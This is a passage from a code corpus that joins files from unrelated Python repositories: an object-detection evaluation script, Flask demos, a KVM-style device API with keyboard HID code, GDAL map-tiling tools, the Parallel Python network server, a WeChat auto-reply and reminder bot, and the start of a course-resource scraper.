macc = 0
for classname in classnames:
print('classname:', classname)
rec, prec, ap, acc_direction = voc_eval(detpath,
annopath,
imagesetfile,
classname,
ovthresh=0.5,
use_07_metric=True)
map = map + ap
#print('rec: ', rec, 'prec: ', prec, 'ap: ', ap)
print('ap: ', ap)
classaps.append(ap)
# count acc_direction
macc = macc + acc_direction
print('accuracy_direction: ', acc_direction)
class_acc.append(acc_direction)
# umcomment to show p-r curve of each category
# plt.figure(figsize=(8,4))
# plt.xlabel('recall')
# plt.ylabel('precision')
# plt.plot(rec, prec)
# plt.show()
map = map/len(classnames)
print('map:', map)
classaps = 100*np.array(classaps)
print('classaps: ', classaps)
# show acc_direction
macc = macc/len(classnames)
print('mean acc_direction: ', macc)
class_acc = 100*np.array(class_acc)
print('class acc_direction: ', class_acc)
if __name__ == '__main__':
main()
```
#### File: BBAVectors-Oriented-Object-Detection/my_tools/train_split.py
```python
import os
import glob
def run(data_dir, split):
img_list = sorted(glob.glob(os.path.join(data_dir, 'images', '*.png')))
train_list = img_list[:split]
test_list = img_list[split:]
with open(os.path.join(data_dir, 'trainval.txt'), 'w') as f:
for img_path in train_list:
img_name = img_path.split('\\')[-1].split('.')[0]
f.write(img_name + '\n')
with open(os.path.join(data_dir, 'test.txt'), 'w') as f:
for img_path in test_list:
img_name = img_path.split('\\')[-1].split('.')[0]
f.write(img_name + '\n')
with open(os.path.join(data_dir, 'valset.txt'), 'w') as f:
for img_path in test_list:
img_name = img_path.split('\\')[-1].split('.')[0]
f.write(img_name + '\n')
if __name__ == '__main__':
data_dir = 'D:/137/dataset/MunichDatasetVehicleDetection-2015-old/DOTA_TrainVal'
run(data_dir, 576)
``` |
{
"source": "13871433675/helloflask",
"score": 3
} |
#### File: demos/wqztemplate/app.py
```python
from flask import Flask, render_template
app = Flask(__name__)
namelist = ['chengli', 'qizhi', 'zhangsan', 'wangqizhi']
name2 = 'wangqizhi'
user = {
'username': 'Grey Li',
'bio': 'A boy who loves movies and music.',
}
movies = [
{'name': 'My Neighbor Totoro', 'year': '1988'},
{'name': 'Three Colours trilogy', 'year': '1993'},
{'name': 'Forrest Gump', 'year': '1994'},
{'name': 'Perfect Blue', 'year': '1997'},
{'name': 'The Matrix', 'year': '1999'},
{'name': 'Memento', 'year': '2000'},
{'name': 'The Bucket list', 'year': '2007'},
{'name': 'Black Swan', 'year': '2010'},
{'name': 'Gone Girl', 'year': '2014'},
{'name': 'CoCo', 'year': '2017'},
]
mylist = ['list01', 'list02']
mydic = {'name': 'dicname'}
@app.route('/')
def index():
return render_template('index.html', movies=movies, name2=name2, mylist=mylist, mydic=mydic)
@app.template_global()
def test():
return "method test!"
``` |
{
"source": "13891024810/Nokidapilot",
"score": 2
} |
#### File: Nokidapilot/app/api.py
```python
import flask
import local_system
api_blueprint = flask.Blueprint('api', __name__, url_prefix='/api')
@api_blueprint.route('/shutdown', methods=['POST'])
def shutdown_post():
try:
local_system.shutdown()
return flask.jsonify({
'success': True,
'error': None,
})
except local_system.Error as e:
return flask.jsonify({
'success': False,
'error': str(e),
}), 500
@api_blueprint.route('/restart', methods=['POST'])
def restart_post():
try:
local_system.restart()
return flask.jsonify({
'success': True,
'error': None,
})
except local_system.Error as e:
return flask.jsonify({
'success': False,
'error': str(e),
}), 500
```
#### File: app/hid/keyboard.py
```python
from hid import write as hid_write
KEYCODE_LEFT_CTRL = 0xe0
KEYCODE_LEFT_SHIFT = 0xe1
KEYCODE_LEFT_ALT = 0xe2
KEYCODE_LEFT_META = 0xe3
KEYCODE_RIGHT_CTRL = 0xe4
KEYCODE_RIGHT_SHIFT = 0xe5
KEYCODE_RIGHT_ALT = 0xe6
KEYCODE_RIGHT_META = 0xe7
_MODIFIER_KEYCODES = [
KEYCODE_LEFT_CTRL, KEYCODE_LEFT_SHIFT, KEYCODE_LEFT_ALT, KEYCODE_LEFT_META,
KEYCODE_RIGHT_CTRL, KEYCODE_RIGHT_SHIFT, KEYCODE_RIGHT_ALT,
KEYCODE_RIGHT_META
]
def send_keystroke(keyboard_path, control_keys, hid_keycode):
# First 8 bytes are for the first keystroke. Second 8 bytes are
# all zeroes to indicate release of keys.
buf = [0] * 8
buf[0] = control_keys
buf[2] = hid_keycode
hid_write.write_to_hid_interface(keyboard_path, buf)
# If it's not a modifier keycode, add a message indicating that the key
# should be released after it is sent.
if hid_keycode not in _MODIFIER_KEYCODES:
release_keys(keyboard_path)
def release_keys(keyboard_path):
hid_write.write_to_hid_interface(keyboard_path, [0] * 8)
```
#### File: app/request_parsers/keystroke.py
```python
import dataclasses
class Error(Exception):
pass
class MissingField(Error):
pass
class InvalidModifierKey(Error):
pass
class InvalidKeyCode(Error):
pass
class InvalidLocation(Error):
pass
@dataclasses.dataclass
class Keystroke:
left_ctrl_modifier: bool
left_shift_modifier: bool
left_alt_modifier: bool
left_meta_modifier: bool
right_alt_modifier: bool
key: str
key_code: int
is_right_modifier: bool
def parse_keystroke(message):
if not isinstance(message, dict):
raise MissingField(
'Keystroke parameter is invalid, expecting a dictionary data type')
required_fields = (
'key',
'keyCode',
'location',
'ctrlKey',
'shiftKey',
'altKey',
'metaKey',
'altGraphKey',
)
for field in required_fields:
if field not in message:
raise MissingField(
'Keystroke request is missing required field: %s' % field)
return Keystroke(
left_ctrl_modifier=_parse_modifier_key(message['ctrlKey']),
left_shift_modifier=_parse_modifier_key(message['shiftKey']),
left_alt_modifier=_parse_modifier_key(message['altKey']),
left_meta_modifier=_parse_modifier_key(message['metaKey']),
right_alt_modifier=_parse_modifier_key(message['altGraphKey']),
key=message['key'],
key_code=_parse_key_code(message['keyCode']),
is_right_modifier=_parse_is_right_key_location(message['location']))
def _parse_modifier_key(modifier_key):
if type(modifier_key) is not bool:
raise InvalidModifierKey('Modifier keys must be boolean values: %s' %
modifier_key)
return modifier_key
def _parse_key_code(key_code):
if type(key_code) is not int:
raise InvalidKeyCode('Key code must be an integer value: %s' % key_code)
if not (0 <= key_code <= 0xff):
raise InvalidKeyCode('Key code must be between 0x00 and 0xff: %d',
key_code)
return key_code
def _parse_is_right_key_location(location):
if location is None:
return False
if type(location) is not str:
raise InvalidLocation('Location must be "left", "right", or null.')
elif location.lower() == 'left':
return False
elif location.lower() == 'right':
return True
raise InvalidLocation('Location must be "left", "right", or null.')
``` |
{
"source": "13903596952/gdal2tiles",
"score": 2
} |
#### File: gdal2tile-mapslicer/mapslicer/gdalpreprocess.py
```python
from osgeo import gdal
from osgeo import osr
import tempfile
import os
import preprocess
#TODO: GetText
from config import _
gdal.AllRegister()
vrt_drv = gdal.GetDriverByName( 'VRT' )
palettecolors = ['Red','Green','Blue','Alpha']
reference = osr.SpatialReference()
class PreprocessError(Exception):
"""To distinguish errors from exceptions in this module."""
def singlefile(filename, bbox = None):
"Returns [visible-filename, visible-georeference, realfilename, geotransform, xsize, ysize, srs]"
osr.DontUseExceptions()
realfilename = filename
georeference = ""
geotransform = None
srs = ""
in_ds = gdal.Open( filename, gdal.GA_ReadOnly)
if not in_ds:
# Note: GDAL prints the ERROR message too
raise PreprocessError(_("It is not possible to open the input file '%s'.") % filename)
xsize = in_ds.RasterXSize
ysize = in_ds.RasterYSize
bands = in_ds.RasterCount
geotransform = in_ds.GetGeoTransform()
srs = in_ds.GetProjection()
if bbox:
# nsew = uly lry lrx ulx
# TODO: set geotransform from [ulx, uly, lrx, lry] + xsize, ysize
geotransform = [0.0,0.0,0.0,0.0,0.0,0.0]
if len(bbox) > 4: # world file - affine transformation
geotransform[1] = bbox[0] # width of pixel
geotransform[4] = bbox[1] # rotational coefficient, zero for north up images.
geotransform[2] = bbox[2] # rotational coefficient, zero for north up images.
geotransform[5] = bbox[3] # height of pixel (but negative)
geotransform[0] = bbox[4] - 0.5*bbox[0] - 0.5*bbox[2] # x offset to center of top left pixel.
geotransform[3] = bbox[5] - 0.5*bbox[1] - 0.5*bbox[3] # y offset to center of top left pixel.
else: # bounding box
geotransform[0] = bbox[3]
geotransform[1] = (bbox[2] - bbox[3]) / float(xsize)
geotransform[2] = 0.0
geotransform[3] = bbox[0]
geotransform[4] = 0.0
geotransform[5] = (bbox[1] - bbox[0]) / float(ysize)
in_ds.SetGeoTransform(geotransform)
elif in_ds.GetGCPCount() != 0:
georeference = "GCPs"
srs = in_ds.GetGCPProjection()
geotransform = gdal.GCPsToGeoTransform(in_ds.GetGCPs())
# Maybe warping before merging ? But warping before merging should use correct pixel size based on max zoom level!
# Or merging only with affine tranformation calculated from GCPs?
# self.out_ds = gdal.AutoCreateWarpedVRT( self.in_ds, self.in_srs_wkt, self.out_srs.ExportToWkt() )
if geotransform != (0.0, 1.0, 0.0, 0.0, 0.0, 1.0) and in_ds.GetGCPCount()==0:
georeference = " ".join(map(str, geotransform))
vrtfilename = str(tempfile.mktemp(os.path.basename(filename)+'.vrt'))
# Is it a paletted raster?
if in_ds.GetRasterBand(1).GetRasterColorTable() and bands==1:
# Expand rasters with palette into RGBA
if bbox:
preprocess.Preprocess(['','-o',vrtfilename,realfilename+'::'+":".join(map(str,bbox))])
else:
preprocess.Preprocess(['','-o',vrtfilename,realfilename])
realfilename = vrtfilename
# Did we added an new geotransform?
elif bbox:
# Save to an GDAL VRT (XML) file to save new geotransform
vrt_drv.CreateCopy(vrtfilename, in_ds)
realfilename = vrtfilename
reference.ImportFromWkt(srs)
srs = reference.ExportToPrettyWkt()
return filename, georeference, realfilename, geotransform, xsize, ysize, srs
def SRSInput(srs):
osr.UseExceptions()
reference.SetFromUserInput(srs)
return reference.ExportToPrettyWkt()
if __name__=='__main__':
import sys
if len(sys.argv) > 1:
print singlefile(sys.argv[1])
else:
print "Specify a single file to preprocess"
```
#### File: mapslicer/pp/ppserver.py
```python
import logging
import getopt
import sys
import socket
import thread
import random
import string
import time
import os
import pptransport
import ppauto
from pp import Server
copyright = "Copyright (c) 2005-2009 <NAME>. All rights reserved"
version = "1.5.7"
# compartibility with Python 2.6
try:
import hashlib
sha_new = hashlib.sha1
except ImportError:
import sha
sha_new = sha.new
class _NetworkServer(Server):
"""Network Server Class
"""
def __init__(self, ncpus="autodetect", interface="0.0.0.0",
broadcast="255.255.255.255", port=None, secret=None,
timeout=None, loglevel=logging.WARNING, restart=False,
proto=0):
Server.__init__(self, ncpus, secret=secret, loglevel=loglevel,
restart=restart, proto=proto)
self.host = interface
self.bcast = broadcast
if port is not None:
self.port = port
else:
self.port = self.default_port
self.timeout = timeout
self.ncon = 0
self.last_con_time = time.time()
self.ncon_lock = thread.allocate_lock()
logging.debug("Strarting network server interface=%s port=%i"
% (self.host, self.port))
if self.timeout is not None:
logging.debug("ppserver will exit in %i seconds if no "\
"connections with clients exist" % (self.timeout))
thread.start_new_thread(self.check_timeout, ())
def ncon_add(self, val):
"""Keeps track of the number of connections and time of the last one"""
self.ncon_lock.acquire()
self.ncon += val
self.last_con_time = time.time()
self.ncon_lock.release()
def check_timeout(self):
"""Checks if timeout happened and shutdowns server if it did"""
while True:
if self.ncon == 0:
idle_time = time.time() - self.last_con_time
if idle_time < self.timeout:
time.sleep(self.timeout - idle_time)
else:
logging.debug("exiting ppserver due to timeout (no client"\
" connections in last %i sec)", self.timeout)
os._exit(0)
else:
time.sleep(self.timeout)
def listen(self):
"""Initiates listenting to incoming connections"""
try:
ssocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# following allows ppserver to restart faster on the same port
ssocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
ssocket.bind((self.host, self.port))
ssocket.listen(5)
except socket.error:
logging.error("Cannot create socket with port " + str(self.port)
+ " (port is already in use)")
try:
while 1:
#accept connections from outside
(csocket, address) = ssocket.accept()
#now do something with the clientsocket
#in this case, we'll pretend this is a threaded server
thread.start_new_thread(self.crun, (csocket, ))
except:
logging.debug("Closing server socket")
ssocket.close()
def crun(self, csocket):
"""Authenticates client and handles its jobs"""
mysocket = pptransport.CSocketTransport(csocket)
#send PP version
mysocket.send(version)
#generate a random string
srandom = "".join([random.choice(string.ascii_letters)
for i in xrange(16)])
mysocket.send(srandom)
answer = sha_new(srandom+self.secret).hexdigest()
cleintanswer = mysocket.receive()
if answer != cleintanswer:
logging.warning("Authentification failed, client host=%s, port=%i"
% csocket.getpeername())
mysocket.send("FAILED")
csocket.close()
return
else:
mysocket.send("OK")
ctype = mysocket.receive()
logging.debug("Control message received: " + ctype)
self.ncon_add(1)
try:
if ctype == "STAT":
#reset time at each new connection
self.get_stats()["local"].time = 0.0
mysocket.send(str(self.get_ncpus()))
while 1:
mysocket.receive()
mysocket.send(str(self.get_stats()["local"].time))
elif ctype=="EXEC":
while 1:
sfunc = mysocket.creceive()
sargs = mysocket.receive()
fun = self.insert(sfunc, sargs)
sresult = fun(True)
mysocket.send(sresult)
except:
#print sys.excepthook(*sys.exc_info())
logging.debug("Closing client socket")
csocket.close()
self.ncon_add(-1)
def broadcast(self):
"""Initiaates auto-discovery mechanism"""
discover = ppauto.Discover(self)
thread.start_new_thread(discover.run,
((self.host, self.port),
(self.bcast, self.port)),
)
def parse_config(file_loc):
"""
Parses a config file in a very forgiving way.
"""
# If we don't have configobj installed then let the user know and exit
try:
from configobj import ConfigObj
except ImportError, ie:
print >> sys.stderr, "ERROR: You must have configobj installed to use \
configuration files. You can still use command line switches."
sys.exit(1)
if not os.access(file_loc, os.F_OK):
print >> sys.stderr, "ERROR: Can not access %s." % arg
sys.exit(1)
# Load the configuration file
config = ConfigObj(file_loc)
# try each config item and use the result if it exists. If it doesn't
# then simply pass and move along
try:
args['secret'] = config['general'].get('secret')
except:
pass
try:
autodiscovery = config['network'].as_bool('autodiscovery')
except:
pass
try:
args['interface'] = config['network'].get('interface',
default="0.0.0.0")
except:
pass
try:
args['broadcast'] = config['network'].get('broadcast')
except:
pass
try:
args['port'] = config['network'].as_int('port')
except:
pass
try:
args['loglevel'] = config['general'].as_bool('debug')
except:
pass
try:
args['ncpus'] = config['general'].as_int('workers')
except:
pass
try:
args['proto'] = config['general'].as_int('proto')
except:
pass
try:
args['restart'] = config['general'].as_bool('restart')
except:
pass
try:
args['timeout'] = config['network'].as_int('timeout')
except:
pass
# Return a tuple of the args dict and autodiscovery variable
return args, autodiscovery
def print_usage():
"""Prints help"""
print "Parallel Python Network Server (pp-" + version + ")"
print "Usage: ppserver.py [-hdar] [-n proto] [-c config_path]"\
" [-i interface] [-b broadcast] [-p port] [-w nworkers]"\
" [-s secret] [-t seconds]"
print
print "Options: "
print "-h : this help message"
print "-d : debug"
print "-a : enable auto-discovery service"
print "-r : restart worker process after each"\
" task completion"
print "-n proto : protocol number for pickle module"
print "-c path : path to config file"
print "-i interface : interface to listen"
print "-b broadcast : broadcast address for auto-discovery service"
print "-p port : port to listen"
print "-w nworkers : number of workers to start"
print "-s secret : secret for authentication"
print "-t seconds : timeout to exit if no connections with "\
"clients exist"
print
print "Due to the security concerns always use a non-trivial secret key."
print "Secret key set by -s switch will override secret key assigned by"
print "pp_secret variable in .pythonrc.py"
print
print "Please visit http://www.parallelpython.com for extended up-to-date"
print "documentation, examples and support forums"
if __name__ == "__main__":
try:
opts, args = getopt.getopt(sys.argv[1:],
"hdarn:c:b:i:p:w:s:t:", ["help"])
except getopt.GetoptError:
print_usage()
sys.exit(1)
args = {}
autodiscovery = False
for opt, arg in opts:
if opt in ("-h", "--help"):
print_usage()
sys.exit()
elif opt == "-c":
args, autodiscovery = parse_config(arg)
elif opt == "-d":
args["loglevel"] = logging.DEBUG
elif opt == "-i":
args["interface"] = arg
elif opt == "-s":
args["secret"] = arg
elif opt == "-p":
args["port"] = int(arg)
elif opt == "-w":
args["ncpus"] = int(arg)
elif opt == "-a":
autodiscovery = True
elif opt == "-r":
args["restart"] = True
elif opt == "-b":
args["broadcast"] = arg
elif opt == "-n":
args["proto"] = int(arg)
elif opt == "-t":
args["timeout"] = int(arg)
server = _NetworkServer(**args)
if autodiscovery:
server.broadcast()
server.listen()
#have to destroy it here explicitelly otherwise an exception
#comes out in Python 2.4
del server
# Parallel Python Software: http://www.parallelpython.com
```
#### File: gdal2tiles/gdal2tile-mapslicer/mapslicer.py
```python
import os, sys
#import gettext
#gettext.install("mapslicer", "./resources/")
#csText = gettext.translation("mapslicer", "./resources/", languages=['cs'])
#deText = gettext.translation("mapslicer", "./resources/", languages=['de'])
##deText.install()
# Where is the executable file on the disk?
exepath = os.getcwd()
if hasattr(sys, "frozen") or sys.executable.find('MapSlicer.app') != -1:
exepath = os.path.dirname(sys.executable)
# Windows: set the GDAL and PROJ variables ..
if sys.platform in ['win32','win64']:
# .. to the local directory in the py2exe distribution
if os.path.exists(os.path.join( exepath, "gdal" )):
os.environ['PROJ_LIB'] = os.path.join( exepath, "proj" )
os.environ['GDAL_DATA'] = os.path.join( exepath, "gdal" )
os.environ['GDAL_DRIVER_PATH'] = os.path.join( exepath, "gdalplugins" )
# .. to the OSGeo4W default directories
elif os.path.exists('C:\\OSGeo4W\\apps\\gdal-16'):
sys.path.insert(0, 'C:\\OSGeo4W\\apps\\gdal-16\\pymod' )
os.environ['PATH'] += ';C:\\OSGeo4W\\bin'
os.environ['PROJ_LIB'] = 'C:\\OSGeo4W\\share\\proj'
os.environ['GDAL_DATA'] = 'C:\\OSGeo4W\\apps\\gdal-16\\share\\gdal'
os.environ['GDAL_DRIVER_PATH'] = 'C:\\OSGeo4W\\apps\\gdal-16\\bin\\gdalplugins'
# otherwise we need to use existing system setup
# Mac: GDAL.framework is in the application bundle or in the /Library/Frameworks
if sys.platform == 'darwin' and not os.environ.has_key('GDAL_DATA'):
frameworkpath = exepath[:(exepath.find('MapSlicer.app')+12)]+'/Contents/Frameworks'
if not os.path.exists( os.path.join(frameworkpath, "GDAL.framework" )):
frameworkpath = "/Library/Frameworks"
os.environ['PROJ_LIB'] = os.path.join( frameworkpath, "PROJ.framework/Resources/proj/" )
os.environ['GDAL_DATA'] = os.path.join( frameworkpath, "GDAL.framework/Resources/gdal/" )
os.environ['GDAL_DRIVER_PATH'] = os.path.join( frameworkpath, "GDAL.framework/PlugIns/" )
sys.path.insert(0, os.path.join( frameworkpath, "GDAL.framework/Versions/Current/Python/site-packages/" ))
# Other systems need correctly installed GDAL libraries
import traceback
import wx
import mapslicer
__version__ = mapslicer.version
class MapSlicerApp(wx.App):
def OnInit(self):
wx.InitAllImageHandlers()
self.main_frame = mapslicer.MainFrame(None, -1, "")
self.SetTopWindow(self.main_frame)
self.SetAppName("MapSlicer")
return True
def MacOpenFile(self, filename):
self.main_frame._add(filename)
def Show(self):
self.main_frame.Show()
def ExceptHook(self, type, value, tb):
back_trace = "".join(traceback.format_exception(type, value, tb))
print
print "=============================================================="
print back_trace
print
caption = _("Exception occured")
message = _("An unexpected error occured:\n\n") + str(value)
wx.MessageBox(message, caption, wx.ICON_ERROR)
if __name__ == "__main__":
#_ = gettext.gettext
_ = lambda s: s
# TODO: Parse command line arguments:
# for both batch processing and initialization of the GUI
#wx.SystemOptions.SetOptionInt("mac.listctrl.always_use_generic",0)
app = MapSlicerApp(False)
try:
from osgeo import gdal
except ImportError:
# TODO: Platform specific error messages - are part of the GUI...
if sys.platform == 'darwin':
wx.MessageBox(_("""GDAL 1.6 framework is not found in your system!\n
Please install GDAL framework from the website:
http://www.kyngchaos.com/software:frameworks"""), _("Error: GDAL Framework not found!"), wx.ICON_ERROR)
import webbrowser
webbrowser.open_new("http://gdal.org")
sys.exit(1)
elif sys.platform in ['win32','win64']:
wx.MessageBox(_("""GDAL 1.6 library is not found in your system!"""),
_("Error: GDAL library not found!"), wx.ICON_ERROR)
sys.exit(1)
elif sys.platform.startswith('linux'):
wx.MessageBox(_("""GDAL 1.6 library is not found in your system!\n
Please install it as a package in your distribution or from the source code:
http://trac.osgeo.org/gdal/wiki/BuildHints"""), _("Error: GDAL library not found!"), wx.ICON_ERROR)
sys.exit(1)
print _("GDAL library not available - please install GDAL and its python module!")
sys.excepthook = app.ExceptHook
app.Show()
app.MainLoop()
``` |
{
"source": "1391382616/EverydayWechat",
"score": 2
} |
#### File: EverydayWechat/everyday_wechat/main.py
```python
import re
import time
# import json
import platform
import random
# from apscheduler.schedulers.blocking import BlockingScheduler
from apscheduler.schedulers.background import BackgroundScheduler
import itchat
from itchat.content import (
TEXT
)
from everyday_wechat.utils.common import md5_encode
from everyday_wechat.utils.data_collection import (
get_bot_info,
get_weather_info,
get_dictum_info,
get_diff_time,
get_calendar_info,
get_constellation_info
)
from everyday_wechat.utils import config
reply_userNames = []
FILEHELPER_MARK = ['文件传输助手', 'filehelper'] # 文件传输助手标识
FILEHELPER = 'filehelper'
TIME_COMPILE = re.compile(r'^\s*([01]?[0-9]|2[0-3])\s*[::\-]\s*([0-5]?[0-9])\s*$')
def run():
""" 主运行入口 """
conf = config.init()
# conf = get_yaml()
if not conf: # 如果 conf,表示配置文件出错。
print('程序中止...')
return
# 判断是否登录,如果没有登录则自动登录,返回 False 表示登录失败
if not is_online(auto_login=True):
return
def is_online(auto_login=False):
"""
判断是否还在线。
:param auto_login: bool,当为 Ture 则自动重连(默认为 False)。
:return: bool,当返回为 True 时,在线;False 已断开连接。
"""
def _online():
"""
通过获取好友信息,判断用户是否还在线。
:return: bool,当返回为 True 时,在线;False 已断开连接。
"""
try:
if itchat.search_friends():
return True
except IndexError:
return False
return True
if _online(): return True # 如果在线,则直接返回 True
if not auto_login: # 不自动登录,则直接返回 False
print('微信已离线..')
return False
hotReload = not config.get('is_forced_switch', False) # 切换微信号,重新扫码。
loginCallback = init_wechat
exitCallback = exit_msg
for _ in range(2): # 尝试登录 2 次。
if platform.system() == 'Windows':
itchat.auto_login(hotReload=hotReload, loginCallback=loginCallback, exitCallback=exitCallback)
itchat.run(blockThread=True)
else:
# 命令行显示登录二维码。
itchat.auto_login(enableCmdQR=2, hotReload=hotReload, loginCallback=loginCallback,
exitCallback=exitCallback)
itchat.run(blockThread=True)
if _online():
print('登录成功')
return True
print('登录失败。')
return False
def init_wechat():
""" 初始化微信所需数据 """
set_system_notice('登录成功')
# conf = get_yaml()
itchat.get_friends(update=True) # 更新好友数据。
itchat.get_chatrooms(update=True) # 更新群聊数据。
# 从config copy ,用于保存新的接口内容。
myset = config.copy()
# start---------------------------处理自动回复好友---------------------------start
relay = myset.get('auto_relay_info')
if relay.get('is_auto_relay'):
auto_reply_uuids = []
for name in relay.get('auto_reply_names'):
if name.lower() in FILEHELPER_MARK: # 判断是否文件传输助手
if FILEHELPER not in reply_userNames:
auto_reply_uuids.append(FILEHELPER)
continue
friend = get_friend(name)
if friend:
auto_reply_uuids.append(friend['UserName'])
else:
print('自动回复中的好友昵称『{}』有误。'.format(name))
relay['auto_reply_uuids'] = set(auto_reply_uuids)
print('已开启图灵自动回复...')
# end---------------------------处理自动回复好友---------------------------end
alarm = myset.get('alarm_info')
alarm_dict = {}
if alarm.get('is_alarm'):
for gi in alarm.get('girlfriend_infos'):
ats = gi.get('alarm_timed')
if not ats:
continue
uuid_list = []
# start---------------------------处理好友---------------------------start
friends = gi.get('wechat_name')
if isinstance(friends, str):
friends = [friends]
if isinstance(friends, list):
for name in friends:
if name.lower() in FILEHELPER_MARK: # 判断是否文件传输助手
uuid_list.append(FILEHELPER)
continue
name_info = get_friend(name)
if not name_info:
print('用户昵称{}无效'.format(name))
else:
uuid_list.append(name_info['UserName'])
# end---------------------------处理好友---------------------------end
# start---------------------------群组处理---------------------------start
group_names = gi.get('group_name')
if isinstance(group_names, str):
group_names = [group_names]
if isinstance(group_names, list):
for name in group_names:
name_info = get_group(name)
if not name_info:
print('定时任务中的群聊名称『{}』有误。'
'(注意:必须要把需要的群聊保存到通讯录)'.format(name))
else:
uuid_list.append(name_info['UserName'])
# end---------------------------群组处理---------------------------end
# start---------------------------定时处理---------------------------start
if isinstance(ats, str):
ats = [ats]
if isinstance(ats, list):
for at in ats:
times = TIME_COMPILE.findall(at)
if not times:
print('时间{}格式出错'.format(at))
continue
hour, minute = int(times[0][0]), int(times[0][1])
temp_dict = {'hour': hour, 'minute': minute, 'uuid_list': uuid_list}
temp_dict.update(gi)
alarm_dict[md5_encode(str(temp_dict))] = temp_dict
# end---------------------------定时处理---------------------------end
alarm['alarm_dict'] = alarm_dict
# 将解析的数据保存于config中。
config.update(myset)
# print(json.dumps(alarm_dict, ensure_ascii=False))
# 提醒内容不为空时,启动定时任务
if alarm_dict:
init_alarm(alarm_dict) # 初始化定时任务
def init_alarm(alarm_dict):
# 定时任务
scheduler = BackgroundScheduler()
for key, value in alarm_dict.items():
scheduler.add_job(send_alarm_msg, 'cron', [key], hour=value['hour'],
minute=value['minute'], id=key, misfire_grace_time=10 * 60)
scheduler.start()
print('已开启定时发送提醒功能...')
# print(scheduler.get_jobs())
def send_alarm_msg(key):
""" 发送定时提醒 """
print('\n启动定时自动提醒...')
conf = config.get('alarm_info').get('alarm_dict')
gf = conf.get(key)
# print(gf)
calendar_info = get_calendar_info(gf.get('calendar'))
dictum = get_dictum_info(gf.get('dictum_channel'))
weather = get_weather_info(gf.get('city_name'))
diff_time = get_diff_time(gf.get('start_date'), gf.get('start_date_msg'))
sweet_words = gf.get('sweet_words')
horoscope = get_constellation_info(gf.get("horescope"))
send_msg = '\n'.join(x for x in [calendar_info, weather, horoscope, dictum, diff_time, sweet_words] if x)
# print('\n' + send_msg + '\n')
if not send_msg or not is_online(): return
uuid_list = gf.get('uuid_list')
for uuid in uuid_list:
time.sleep(1)
itchat.send(send_msg, toUserName=uuid)
print('\n定时内容:\n{}\n发送成功...\n\n'.format(send_msg))
print('自动提醒消息发送完成...\n')
@itchat.msg_register([TEXT])
def text_reply(msg):
""" 监听用户消息,用于自动回复 """
try:
# if not get_yaml().get('is_auto_relay'):
# return
conf = config.get('auto_relay_info')
if not conf.get('is_auto_relay'):
return
# print(json.dumps(msg, ensure_ascii=False))
# 获取发送者的用户id
uuid = FILEHELPER if msg['ToUserName'] == FILEHELPER else msg.fromUserName
# 如果用户id是自动回复列表的人员
if uuid in conf.get('auto_reply_uuids'):
receive_text = msg.text # 好友发送来的消息内容
# 好友叫啥,用于打印
nickName = FILEHELPER if uuid == FILEHELPER else msg.user.nickName
print('\n{}发来信息:{}'.format(nickName, receive_text))
reply_text = get_bot_info(receive_text, uuid) # 获取自动回复
if reply_text: # 如内容不为空,回复消息
time.sleep(random.randint(1, 2)) # 休眠一秒,保安全。想更快的,可以直接注释。
reply_text = reply_text if not uuid == FILEHELPER else '机器人回复:' + reply_text
itchat.send(reply_text, toUserName=uuid)
print('回复{}:{}'.format(nickName, reply_text))
else:
print('自动回复失败\n')
except Exception as exception:
print(str(exception))
def set_system_notice(text):
"""
给文件传输助手发送系统日志。
:param text:str 日志内容
"""
if text:
text = '系统通知:' + text
itchat.send(text, toUserName=FILEHELPER)
def exit_msg():
""" 项目中止提醒 """
set_system_notice('项目已断开连接')
def get_group(gruop_name, update=False):
"""
根据群组名获取群组数据
:param wechat_name:str, 群组名
:param update: bool 强制更新群组数据
:return: obj 单个群组信息
"""
if update: itchat.get_chatrooms(update=True)
if not gruop_name: return None
groups = itchat.search_chatrooms(name=gruop_name)
if not groups: return None
return groups[0]
def get_friend(wechat_name, update=False):
"""
根据用户名获取用户数据
:param wechat_name: str 用户名
:param update: bool 强制更新用户数据
:return: obj 单个好友信息
"""
if update: itchat.get_friends(update=True)
if not wechat_name: return None
friends = itchat.search_friends(name=wechat_name)
if not friends: return None
return friends[0]
if __name__ == '__main__':
run()
# pass
# config.init()
# init_wechat()
``` |
{
"source": "1392517138/MOOC-Download-master",
"score": 3
} |
#### File: 1392517138/MOOC-Download-master/main.py
```python
import requests
# from bs4 import BeautifulSoup
import re
import os
import pymysql
HEADER = {'User-Agent': 'Mozilla/5.0'}
SOURCE_INFO_URL = 'http://www.icourse163.org/dwr/call/plaincall/CourseBean.getMocTermDto.dwr'
SOURCE_RESOURCE_URL = 'http://www.icourse163.org/dwr/call/plaincall/CourseBean.getLessonUnitLearnVo.dwr'
class Course(object):
'''
存储课程相关信息
'''
def __init__(self, *args, **kwargs):
self.course_page_url = 'http://www.icourse163.org/learn/'
def set_course(self, course):
self.course = course
def get_course_info(self):
try:
'''
获取课程基本信息
获取课程id用于发送post请求
'''
course_page_url = self.course_page_url + self.course
course_page = requests.get(course_page_url, headers=HEADER)
id_pattern_compile = re.compile(r'id:(\d+),')
# 获取课程名称
basicinfo_pattern_compile = re.compile(
r'<meta name="description" .*?content=".*?,(.*?),(.*?),.*?/>')
basic_set = re.search(basicinfo_pattern_compile, course_page.text)
self.course_title = basic_set.group(1)
self.course_collage = basic_set.group(2)
self.course_id = re.search(id_pattern_compile,
course_page.text).group(1)
except ArithmeticError:
pass
def get_course_all_source(course_id):
'''
通过解析的course_id获取当前所有可下载的资源信息
'''
# 选择下载视频的清晰度
video_level = select_video_level()
# c0-param0:代表课程id
# batchId:可以为任意时间戳
# 其他字段为固定不变字段
print(video_level + '---video_level')
post_data = {
'callCount': '1',
'scriptSessionId': '${scriptSessionId}190',
'c0-scriptName': 'CourseBean',
'c0-methodName': 'getMocTermDto',
'c0-id': '0',
'c0-param0': 'number:' + course_id,
'c0-param1': 'number:1',
'c0-param2': 'boolean:true',
'batchId': '1492167717772'
}
print(course_id + '---get_course_all_source')
source_info = requests.post(
SOURCE_INFO_URL, data=post_data, headers=HEADER)
# 对文档内容进行解码,以便查看中文
source_info_transcoding = source_info.text.encode('utf-8').decode(
'unicode_escape')
# 这里的id是一级目录id
chapter_pattern_compile = re.compile(
r'homeworks=.*?;.+id=(\d+).*?name="(.*?)";')
# 查找所有一级级目录id和name
chapter_set = re.findall(chapter_pattern_compile, source_info_transcoding)
with open('TOC.txt', 'w', encoding='utf-8') as file:
# 遍历所有一级目录id和name并写入目录
for index, single_chaper in enumerate(chapter_set):
